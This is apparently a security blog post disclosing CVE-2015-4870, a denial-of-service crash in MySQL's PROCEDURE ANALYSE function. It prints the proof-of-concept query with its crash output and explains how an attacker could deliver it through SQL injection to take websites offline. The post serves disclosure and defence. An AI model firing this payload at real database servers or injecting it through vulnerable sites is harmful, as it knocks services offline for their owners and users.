MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

Reading Time: 3 Minutes
It's only fair to share...
Share on Facebook38Tweet about this on TwitterShare on LinkedIn40Share on Google+1

Sri Lankan Security researcher Osanda Malith discovered a DoS -or crash- vulnerability in MySQL’s Procedure Analyse Function. The vulnerability crashes MySQL versions up to 5.5.45.

Advertisement:

MySQL DoS/crash vulnerability details #

Osanda Malith found this crash in the function procedure analyse() while passing a sub query. It’s syntax:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an example POC would be:

select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
 
mysql>

On Windows, this crashes mysql.exe and an administrator needs to restart the MySQL service. In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server. In *nix systems mysqld will automatically recover but still if we keep on sending multiple GET requests with this payload the database will crash.

Taking advantage (exploiting the crash bug) #

Osanda Malith writes:

If you came across a website vulnerable to SQL injection you can simply perform a DoS attack so that MySQL server will not respond and the entire database of the website would be down meaning the website will be no longer in an active state.
In Windows based systems in a single request the process will crash. We have to manually restart the MySQL server.

This sounds like a very nasty side-affect of SQL injection vulnerability. In August 2014 I wrote about MySQL sleep() attacks being carried out in the wild. Here an attacker injects sleep(3) into a vulnerable web application, making mysqld sleep for the given amount of time, for every record found -depending on where the sleep() is injected of course. That was a Denial of Service attack on the whole MySQL server, quickly consuming all available connections.

Related:   Exploit PHP's mail() to get remote code execution

This crash/DoS vulnerability however, requires only one request for MySQL on Windows Server, to crash mysql.exe, and a continuous stream of requests for Linux/Unix operating systems because the mysqld service will automatically recover.

Full MySQL Vulnerability details blog post #

Read the full details in Osanda Malith’s blog post.

It's only fair to share...
Share on Facebook38Tweet about this on TwitterShare on LinkedIn40Share on Google+1

Advertisement:

Hi! Join the discussion, leave a reply!